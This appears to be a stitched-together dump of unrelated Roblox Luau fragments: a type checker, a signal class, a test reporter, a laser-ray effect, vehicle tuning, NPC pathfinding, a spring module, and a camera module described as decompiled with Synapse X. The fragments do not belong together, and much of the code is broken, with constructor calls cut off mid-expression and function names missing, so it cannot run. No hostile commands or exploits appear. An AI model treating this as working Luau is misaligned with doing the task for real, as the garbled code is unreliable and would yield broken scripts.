Tune.WsThickness = .1 -- Wishbone Rod Thickness
--[[** ensure value is an Instance and it's ClassName matches the given ClassName by an IsA comparison @param className The class name to check for @returns A function that will return true iff the condition is passed **--]]
function t.instanceIsA(className) assert(t.string(className)) return function(value) local instanceSuccess, instanceErrMsg = t.Instance(value) if not instanceSuccess then return false, instanceErrMsg or "" end if not value:IsA(className) then return false, string.format("%s expected, got %s", className, value.ClassName) end return true end end
-- Signal class
local Signal = {} Signal.__index = Signal function local self = setmetatable({ _handlerListHead = false, }, Signal) if createConnectionsChangedSignal then self.totalConnections = 0 self.connectionsChanged = end return self end function Signal:Connect(fn) local connection =, fn) if self._handlerListHead then connection._next = self._handlerListHead self._handlerListHead = connection else self._handlerListHead = connection end if self.connectionsChanged then self.totalConnections += 1 self.connectionsChanged:Fire(1) end return connection end
--[[ Copy of TextReporter that doesn't output successful tests. This should be temporary, it's just a workaround to make CI environments happy in the short-term. ]]
local TestService = game:GetService("TestService") local CurrentModule = script.Parent local Packages = CurrentModule.Parent.Parent local success, JestMatcherUtils = pcall(function() return require(Packages.JestMatcherUtils) end) local EXPECTED_COLOR = success and JestMatcherUtils.EXPECTED_COLOR or function() end local RECEIVED_COLOR = success and JestMatcherUtils.RECEIVED_COLOR or function() end local BOLD_WEIGHT = success and JestMatcherUtils.BOLD_WEIGHT or function() end local DIM_COLOR = success and JestMatcherUtils.DIM_COLOR or function() end local TestEnum = require(script.Parent.Parent.TestEnum) local INDENT = (" "):rep(3) local STATUS_SYMBOLS = { [TestEnum.TestStatus.Success] = EXPECTED_COLOR("+"), [TestEnum.TestStatus.Failure] = RECEIVED_COLOR("-"), [TestEnum.TestStatus.Skipped] = DIM_COLOR("~"), } local UNKNOWN_STATUS_SYMBOL = "?" local TextReporterQuiet = {} local function reportNode(node, buffer, level) buffer = buffer or {} level = level or 0 if node.status == TestEnum.TestStatus.Skipped then return buffer end local line if node.status ~= TestEnum.TestStatus.Success then local symbol = STATUS_SYMBOLS[node.status] or UNKNOWN_STATUS_SYMBOL line = ("%s[%s] %s"):format(INDENT:rep(level), symbol, node.planNode.phrase) end table.insert(buffer, line) for _, child in ipairs(node.children) do reportNode(child, buffer, level + 1) end return buffer end local function reportRoot(node) local buffer = {} for _, child in ipairs(node.children) do reportNode(child, buffer, 0) end return buffer end local function report(root) local buffer = reportRoot(root) return table.concat(buffer, "\n") end function local resultBuffer = { "Test results:", report(results), ("%d passed, %d failed, %d skipped"):format(results.successCount, results.failureCount, results.skippedCount), } print(table.concat(resultBuffer, "\n")) if results.failureCount > 0 then print(("%d test nodes reported failures."):format(results.failureCount)) end if #results.errors > 0 then print("Errors reported by tests:") print("") for _, e in ipairs(results.errors) do print(BOLD_WEIGHT(RECEIVED_COLOR("• " .. e.phrase))) print("") TestService:Error(e.message) -- Insert a blank line after each error print("") end end end return TextReporterQuiet
--[[ Constants ]]
-- local TOUCH_CONTROL_SHEET = "rbxasset://textures/ui/TouchControlsSheet.png"
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- Place this into StarterGui or StarterPack -- -- CREDIT -- -- WhoBloxxedWho; for the initial script -- -- DoogleFox; some stuff ripped from his panner script -- -- DuruTeru; shoving it all into this script and then some :) -- -- UPDATE: turned it into r15, made it so you can swim right in water -- -- Jan 07, 2017 -- -- UPDATE: added walkspeed easing directionally, also adding running -- -- Nov 13, 2020 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
--Made by Luckymaxer
Debris = game:GetService("Debris") Camera = game:GetService("Workspace").CurrentCamera Sounds = { RayHit = script:WaitForChild("Hit") } BasePart ="Part") BasePart.Shape = Enum.PartType.Block BasePart.Material = Enum.Material.Plastic BasePart.TopSurface = Enum.SurfaceType.Smooth BasePart.BottomSurface = Enum.SurfaceType.Smooth BasePart.FormFactor = Enum.FormFactor.Custom BasePart.Size =, 0.2, 0.2) BasePart.CanCollide = true BasePart.Locked = true BasePart.Anchored = false BaseRay = BasePart:Clone() BaseRay.Name = "Laser" BaseRay.BrickColor ="Lime green") BaseRay.Material = Enum.Material.SmoothPlastic BaseRay.Size =, 0.2, 0.2) BaseRay.Anchored = true BaseRay.CanCollide = false BaseRayMesh ="SpecialMesh") BaseRayMesh.Name = "Mesh" BaseRayMesh.MeshType = Enum.MeshType.Brick BaseRayMesh.Scale =, 0.2, 1) BaseRayMesh.Offset =, 0, 0) BaseRayMesh.VertexColor =, 1, 1) BaseRayMesh.Parent = BaseRay function PlaySound(Position, Sound) local SoundPart = BasePart:Clone() SoundPart.Name = "ParticlePart" SoundPart.Transparency = 1 SoundPart.Anchored = true SoundPart.CanCollide = false local SoundObject = Sound:Clone() SoundObject.Parent = SoundPart Debris:AddItem(SoundPart, 1.5) SoundPart.Parent = game:GetService("Workspace") SoundPart.CFrame = SoundObject:Play() end function FireRay(StartPosition, TargetPosition, Hit) local Vec = (TargetPosition - StartPosition) local Distance = Vec.magnitude local Direction = Vec.unit local PX = (StartPosition + (0.25 * Distance) * Direction) local PY = (StartPosition + (0.5 * Distance) * Direction) local PZ = (StartPosition + (0.75 * Distance) * Direction) local DX = (StartPosition - PX).magnitude local DY = (PX - PY).magnitude local DZ = (PY - PZ).magnitude local Limit = 2 local AX = (PX +, (-0.21 * DX)), math.min(Limit, (0.21 * DX))),math.random(math.max(-Limit, (-0.21 * DX)),math.min(Limit, (0.21 * DX))), math.random(math.max(-Limit, (-0.21 * DX)), math.min(Limit, (0.21 * DX))))) local AY = (PY +, (-0.21 * DY)), math.min(Limit, (0.21 * DY))),math.random(math.max(-Limit, (-0.21 * DY)),math.min(Limit, (0.21 * DY))), math.random(math.max(-Limit, (-0.21 * DY)), math.min(Limit, (0.21 * DY))))) local AZ = (PZ +, (-0.21 * DZ)), math.min(Limit, (0.21 * DZ))),math.random(math.max(-Limit, (-0.21 * DZ)),math.min(Limit, (0.21 * DZ))), math.random(math.max(-Limit, (-0.21 * DZ)), math.min(Limit, (0.21 * DZ))))) local Rays = { {Distance = (AX - StartPosition).magnitude, Direction =, AX)}, {Distance = (AY - AX).magnitude, Direction =, AY)}, {Distance = (AZ - AY).magnitude, Direction =, AZ)}, {Distance = (TargetPosition - AZ).magnitude, Direction =, TargetPosition)}, } for i, v in pairs(Rays) do local Ray = BaseRay:Clone() Ray.BrickColor ="New Yeller") Ray.Reflectance = 0.4 Ray.Transparency = 0.7 local Mesh = Ray.Mesh Mesh.Scale = (, 0.15, (v.Distance / 1)) * 5) Ray.CFrame = (v.Direction *, 0, (-0.5 * v.Distance))) Debris:AddItem(Ray, (0.1 / (#Rays - (i - 1)))) Ray.Parent = Camera end end pcall(function() local StartPosition = script:WaitForChild("StartPosition").Value local TargetPosition = script:WaitForChild("TargetPosition").Value local RayHit = script:WaitForChild("RayHit").Value FireRay(StartPosition, TargetPosition) if RayHit then PlaySound(TargetPosition, Sounds.RayHit) end end) Debris:AddItem(script, 1)
--[[ Подготовительный скрипт - распихивает скрипты по моделям в точках финиша ]]
local RebuildWorld = 300 -- период пересоздания игрового мира local PartWorld = script.Parts.Value -- число блоков в мире
--- Hides Cmdr window
function Cmdr:Hide () Interface.Window:Hide() end
------//Patrol Animations
self.RightPatrol =, 1.5, -0.45) * CFrame.Angles(math.rad(-30), math.rad(0), math.rad(0)); self.LeftPatrol =,1.35,-0.75) * CFrame.Angles(math.rad(-30),math.rad(35),math.rad(-25));
--- Player joined
game.Players.PlayerAdded:Connect(function(player) --- Check for new gamepasses CheckPlayer(player) end)
-- Decompiled with the Synapse X Luau decompiler.
local v1 =, 0, 1); local v2 = { InitialDistance = 25, MinDistance = 10, MaxDistance = 100, InitialElevation = 35, MinElevation = 35, MaxElevation = 35, ReferenceAzimuth = -45, CWAzimuthTravel = 90, CCWAzimuthTravel = 90, UseAzimuthLimits = false }; local v3 = require(script.Parent:WaitForChild("BaseCamera")); local v4 = setmetatable({}, v3); v4.__index = v4; function local v5 = setmetatable(, v4); v5.lastUpdate = tick(); v5.changedSignalConnections = {}; v5.refAzimuthRad = nil; v5.curAzimuthRad = nil; v5.minAzimuthAbsoluteRad = nil; v5.maxAzimuthAbsoluteRad = nil; v5.useAzimuthLimits = nil; v5.curElevationRad = nil; v5.minElevationRad = nil; v5.maxElevationRad = nil; v5.curDistance = nil; v5.minDistance = nil; v5.maxDistance = nil; v5.gamepadDollySpeedMultiplier = 1; v5.lastUserPanCamera = tick(); v5.externalProperties = {}; v5.externalProperties.InitialDistance = 25; v5.externalProperties.MinDistance = 10; v5.externalProperties.MaxDistance = 100; v5.externalProperties.InitialElevation = 35; v5.externalProperties.MinElevation = 35; v5.externalProperties.MaxElevation = 35; v5.externalProperties.ReferenceAzimuth = -45; v5.externalProperties.CWAzimuthTravel = 90; v5.externalProperties.CCWAzimuthTravel = 90; v5.externalProperties.UseAzimuthLimits = false; v5:LoadNumberValueParameters(); return v5; end; function v4.LoadOrCreateNumberValueParameter(p1, p2, p3, p4) local v6 = script:FindFirstChild(p2); if v6 and v6:isA(p3) then p1.externalProperties[p2] = v6.Value; else if p1.externalProperties[p2] == nil then return; end; v6 =; v6.Name = p2; v6.Parent = script; v6.Value = p1.externalProperties[p2]; end; if p4 then if p1.changedSignalConnections[p2] then p1.changedSignalConnections[p2]:Disconnect(); end; p1.changedSignalConnections[p2] = v6.Changed:Connect(function(p5) p1.externalProperties[p2] = p5; p4(p1); end); end; end; function v4.SetAndBoundsCheckAzimuthValues(p6) p6.minAzimuthAbsoluteRad = math.rad(p6.externalProperties.ReferenceAzimuth) - math.abs(math.rad(p6.externalProperties.CWAzimuthTravel)); p6.maxAzimuthAbsoluteRad = math.rad(p6.externalProperties.ReferenceAzimuth) + math.abs(math.rad(p6.externalProperties.CCWAzimuthTravel)); p6.useAzimuthLimits = p6.externalProperties.UseAzimuthLimits; if p6.useAzimuthLimits then p6.curAzimuthRad = math.max(p6.curAzimuthRad, p6.minAzimuthAbsoluteRad); p6.curAzimuthRad = math.min(p6.curAzimuthRad, p6.maxAzimuthAbsoluteRad); end; end; function v4.SetAndBoundsCheckElevationValues(p7) local v7 = math.max(p7.externalProperties.MinElevation, -80); local v8 = math.min(p7.externalProperties.MaxElevation, 80); p7.minElevationRad = math.rad(math.min(v7, v8)); p7.maxElevationRad = math.rad(math.max(v7, v8)); p7.curElevationRad = math.max(p7.curElevationRad, p7.minElevationRad); p7.curElevationRad = math.min(p7.curElevationRad, p7.maxElevationRad); end; function v4.SetAndBoundsCheckDistanceValues(p8) p8.minDistance = p8.externalProperties.MinDistance; p8.maxDistance = p8.externalProperties.MaxDistance; p8.curDistance = math.max(p8.curDistance, p8.minDistance); p8.curDistance = math.min(p8.curDistance, p8.maxDistance); end; function v4.LoadNumberValueParameters(p9) p9:LoadOrCreateNumberValueParameter("InitialElevation", "NumberValue", nil); p9:LoadOrCreateNumberValueParameter("InitialDistance", "NumberValue", nil); p9:LoadOrCreateNumberValueParameter("ReferenceAzimuth", "NumberValue", p9.SetAndBoundsCheckAzimuthValue); p9:LoadOrCreateNumberValueParameter("CWAzimuthTravel", "NumberValue", p9.SetAndBoundsCheckAzimuthValues); p9:LoadOrCreateNumberValueParameter("CCWAzimuthTravel", "NumberValue", p9.SetAndBoundsCheckAzimuthValues); p9:LoadOrCreateNumberValueParameter("MinElevation", "NumberValue", p9.SetAndBoundsCheckElevationValues); p9:LoadOrCreateNumberValueParameter("MaxElevation", "NumberValue", p9.SetAndBoundsCheckElevationValues); p9:LoadOrCreateNumberValueParameter("MinDistance", "NumberValue", p9.SetAndBoundsCheckDistanceValues); p9:LoadOrCreateNumberValueParameter("MaxDistance", "NumberValue", p9.SetAndBoundsCheckDistanceValues); p9:LoadOrCreateNumberValueParameter("UseAzimuthLimits", "BoolValue", p9.SetAndBoundsCheckAzimuthValues); p9.curAzimuthRad = math.rad(p9.externalProperties.ReferenceAzimuth); p9.curElevationRad = math.rad(p9.externalProperties.InitialElevation); p9.curDistance = p9.externalProperties.InitialDistance; p9:SetAndBoundsCheckAzimuthValues(); p9:SetAndBoundsCheckElevationValues(); p9:SetAndBoundsCheckDistanceValues(); end; function v4.GetModuleName(p10) return "OrbitalCamera"; end; local u1 = require(script.Parent:WaitForChild("CameraUtils")); function v4.SetInitialOrientation(p11, p12) if not p12 or not p12.RootPart then warn("OrbitalCamera could not set initial orientation due to missing humanoid"); return; end; assert(p12.RootPart, ""); local l__Unit__9 = (p12.RootPart.CFrame.LookVector -, 0.23, 0)).Unit; if not u1.IsFinite((u1.GetAngleBetweenXZVectors(l__Unit__9, p11:GetCameraLookVector()))) then end; if not u1.IsFinite(math.asin(p11:GetCameraLookVector().Y) - math.asin(l__Unit__9.Y)) then end; end; function v4.GetCameraToSubjectDistance(p13) return p13.curDistance; end; local l__Players__2 = game:GetService("Players"); function v4.SetCameraToSubjectDistance(p14, p15) if l__Players__2.LocalPlayer then p14.currentSubjectDistance = math.clamp(p15, p14.minDistance, p14.maxDistance); p14.currentSubjectDistance = math.max(p14.currentSubjectDistance, p14.FIRST_PERSON_DISTANCE_THRESHOLD); end; p14.inFirstPerson = false; p14:UpdateMouseBehavior(); return p14.currentSubjectDistance; end; local u3 =, 0, 0); function v4.CalculateNewLookVector(p16, p17, p18) local v10 = p17 or p16:GetCameraLookVector(); local v11 = math.asin(v10.Y); local v12 =, (math.clamp(p18.Y, v11 - 1.3962634015954636, v11 - -1.3962634015954636))); return (CFrame.Angles(0, -v12.X, 0) *, v10) * CFrame.Angles(-v12.Y, 0, 0)).LookVector; end; local u4 = require(script.Parent:WaitForChild("CameraInput")); local l__VRService__5 = game:GetService("VRService"); local u6 =, 0, 1); local u7 = 2 * math.pi; function v4.Update(p19, p20) local v13 = tick(); local v14 = v13 - p19.lastUpdate; local v15 = u4.getRotation() ~=; local l__CurrentCamera__16 = workspace.CurrentCamera; local v17 = l__CurrentCamera__16.CFrame; local l__Focus__18 = l__CurrentCamera__16.Focus; local v19 = l__CurrentCamera__16 and l__CurrentCamera__16.CameraSubject; local v20 = v19 and v19:IsA("VehicleSeat"); local v21 = v19 and v19:IsA("SkateboardPlatform"); if p19.lastUpdate == nil or v14 > 1 then p19.lastCameraTransform = nil; end; if v15 then p19.lastUserPanCamera = tick(); end; local v22 = p19:GetSubjectPosition(); if v22 and l__Players__2.LocalPlayer and l__CurrentCamera__16 then if p19.gamepadDollySpeedMultiplier ~= 1 then p19:SetCameraToSubjectDistance(p19.currentSubjectDistance * p19.gamepadDollySpeedMultiplier); end; local l__VREnabled__23 = l__VRService__5.VREnabled; local v24 = l__VREnabled__23 and p19:GetVRFocus(v22, v14) or; local v25 = u4.getRotation(); if l__VREnabled__23 and not p19:IsInFirstPerson() then local v26 = p19:GetCameraHeight(); local v27 = v22 - l__CurrentCamera__16.CFrame.p; local l__Magnitude__28 = v27.Magnitude; if p19.currentSubjectDistance < l__Magnitude__28 or v25.X ~= 0 then local v29 = p19:CalculateNewLookVector(v27.Unit * u6,, 0)) * math.min(l__Magnitude__28, p19.currentSubjectDistance); local v30 = v24.p - v29; local v31 = l__CurrentCamera__16.CFrame.LookVector; if v25.X ~= 0 then v31 = v29; end; v17 =, ( + v31.X, v30.Y, v30.Z + v31.Z))) +, v26, 0); end; else p19.curAzimuthRad = p19.curAzimuthRad - v25.X; if p19.useAzimuthLimits then p19.curAzimuthRad = math.clamp(p19.curAzimuthRad, p19.minAzimuthAbsoluteRad, p19.maxAzimuthAbsoluteRad); else p19.curAzimuthRad = p19.curAzimuthRad ~= 0 and math.sign(p19.curAzimuthRad) * (math.abs(p19.curAzimuthRad) % u7) or 0; end; p19.curElevationRad = math.clamp(p19.curElevationRad + v25.Y, p19.minElevationRad, p19.maxElevationRad); v17 = + p19.currentSubjectDistance * (CFrame.fromEulerAnglesYXZ(-p19.curElevationRad, p19.curAzimuthRad, 0) * v1), v22); end; p19.lastCameraTransform = v17; p19.lastCameraFocus = l__Focus__18; if (v20 or v21) and v19:IsA("BasePart") then p19.lastSubjectCFrame = v19.CFrame; else p19.lastSubjectCFrame = nil; end; end; p19.lastUpdate = v13; return v17, l__Focus__18; end; return v4;
-- Recoil related functions
function ShoulderCamera:setCurrentRecoilIntensity(x, y) self.currentRecoil =, y) end function ShoulderCamera:addRecoil(recoilAmount) self.currentRecoil = self.currentRecoil + recoilAmount end
----------------- --| Variables |-- -----------------
local GamePassService = Game:GetService('GamePassService') local PlayersService = Game:GetService('Players') local LightingService = Game:GetService('Lighting') --TODO: Use new data store service once that exists local GamePassIdObject = WaitForChild(script, 'GamePassId') local AdminTools = WaitForChild(LightingService, 'AdminTools')
-- no touchy
local path local waypoint local oldpoints local isWandering = 0 if canWander then spawn(function() while isWandering == 0 do isWandering = 1 local desgx, desgz = hroot.Position.x + math.random(-WanderX, WanderX), hroot.Position.z + math.random(-WanderZ, WanderZ) human:MoveTo(, 0, desgz) ) wait(math.random(4, 6)) isWandering = 0 end end) end while wait() do local enemytorso = GetTorso(hroot.Position) if enemytorso ~= nil then -- if player detected isWandering = 1 local function checkw(t) local ci = 3 if ci > #t then ci = 3 end if t[ci] == nil and ci < #t then repeat ci = ci + 1 wait() until t[ci] ~= nil return, 0, 0) + t[ci] else ci = 3 return t[ci] end end path = pfs:FindPathAsync(hroot.Position, enemytorso.Position) waypoint = path:GetWaypoints() oldpoints = waypoint local connection; local direct = Vector3.FromNormalId(Enum.NormalId.Front) local ncf = hroot.CFrame * direct = ncf.p.unit local rootr =, direct) local phit, ppos = game.Workspace:FindPartOnRay(rootr, hroot) if path and waypoint or checkw(waypoint) then if checkw(waypoint) ~= nil and checkw(waypoint).Action == Enum.PathWaypointAction.Walk then human:MoveTo( checkw(waypoint).Position ) human.Jump = false end -- CANNOT LET BALDI JUMPS -- --[[if checkw(waypoint) ~= nil and checkw(waypoint).Action == Enum.PathWaypointAction.Jump then human.Jump = true connection = human.Changed:connect(function() human.Jump = true end) human:MoveTo( checkw(waypoint).Position ) else human.Jump = false end]] --[[hroot.Touched:connect(function(p) local bodypartnames = GetPlayersBodyParts(enemytorso) if p:IsA'Part' and not p.Name == bodypartnames and phit and phit.Name ~= bodypartnames and phit:IsA'Part' and rootr:Distance(phit.Position) < 5 then connection = human.Changed:connect(function() human.Jump = true end) else human.Jump = false end end)]] if connection then connection:Disconnect() end else for i = 3, #oldpoints do human:MoveTo( oldpoints[i].Position ) end end elseif enemytorso == nil and canWander then -- if player not detected isWandering = 0 path = nil waypoint = nil human.MoveToFinished:Wait() end end
-- Hello, User removing this script will break the board. If you need to ask something dm Yeah_Ember
--Torque Curve Tune.Horsepower = 1750 -- [TORQUE CURVE VISUAL] Tune.IdleRPM = 700 -- Tune.PeakRPM = 7700 -- Use sliders to manipulate values Tune.Redline = 8000 -- Copy and paste slider values into the respective tune values Tune.EqPoint = 5500 Tune.PeakSharpness = 7.5 Tune.CurveMult = 0.16 --Incline Compensation Tune.InclineComp = 1.7 -- Torque compensation multiplier for inclines (applies gradient from 0-90 degrees) --Misc Tune.RevAccel = 150 -- RPM acceleration when clutch is off Tune.RevDecay = 75 -- RPM decay when clutch is off Tune.RevBounce = 500 -- RPM kickback from redline Tune.IdleThrottle = 3 -- Percent throttle at idle Tune.ClutchTol = 500 -- Clutch engagement threshold (higher = faster response)
local TweenService = game:GetService("TweenService") local MPS = game:GetService("MarketplaceService")
car.Body.CarName.Value.VehicleSeat.ChildRemoved:connect(function(child) if child.Name=="SeatWeld" and child:IsA("Weld") then script.Parent:Destroy() end end)
--do -- springs, ok, totally not from treyreynolds
--local runtime = game ("GetService", "RunService") local t = 0 spring = {mt = {}} = spring function initial ) local t0 = tick() local p0 = initial or 0 local v0 = initial and 0 * initial or 0 local t = initial or 0 local d = 1 local s = 1 local function positionvelocity(tick) local x =tick-t0 local c0 =p0-t if s==0 then return p0,0 elseif d<1 then local c =(1-d*d)^0.5 local c1 =(v0/s+d*c0)/c local co =math.cos(c*s*x) local si =math.sin(c*s*x) local e =2.718281828459045^(d*s*x) return t+(c0*co+c1*si)/e, s*((c*c1-d*c0)*co-(c*c0+d*c1)*si)/e else local c1 =v0/s+c0 local e =2.718281828459045^(s*x) return t+(c0+c1*s*x)/e, s*(c1-c0-c1*s*x)/e end end return setmetatable({},{ __index=function(_, index) if index == "value" or index == "position" or index == "p" then local p,v = positionvelocity(tick()) return p elseif index == "velocity" or index == "v" then local p,v = positionvelocity(tick()) return v elseif index == "acceleration" or index == "a" then local x = tick()-t0 local c0 = p0-t if s == 0 then return 0 elseif d < 1 then local c =(1-d*d)^0.5 local c1 = (v0/s+d*c0)/c return s*s*((d*d*c0-2*c*d*c1-c*c*c0)*math.cos(c*s*x) +(d*d*c1+2*c*d*c0-c*c*c1)*math.sin(c*s*x)) /2.718281828459045^(d*s*x) else local c1 = v0/s+c0 return s*s*(c0-2*c1+c1*s*x) /2.718281828459045^(s*x) end elseif index == "target" or index == "t" then return t elseif index == "damper" or index == "d" then return d elseif index == "speed" or index == "s" then return s end end; __newindex=function(_, index, value) local time = tick() if index == "value" or index == "position" or index == "p" then local p,v = positionvelocity(time) p0, v0 = value, v elseif index == "velocity" or index == "v" then local p,v = positionvelocity(time) p0, v0 = p, value elseif index == "acceleration" or index == "a" then local p, v = positionvelocity(time) p0, v0 = p, v + value elseif index == "target" or index == "t" then p0, v0 = positionvelocity(time) t = value elseif index == "damper" or index == "d" then p0, v0 = positionvelocity(time) d = value < 0 and 0 or value < 1 and value or 1 elseif index == "speed" or index == "s" then p0, v0 = positionvelocity(time) s = value < 0 and 0 or value end t0 = time end; }) end return spring
--script.Parent.Parent.Visible = true
script.Parent.MouseButton1Click:connect(function() script.Parent.Parent.Visible = false end)
-- To make sure whispering behavior remains consistent, this is currently set at 50 characters
module.MaxChannelNameCheckLength = 50
local main = _G.HDAdminMain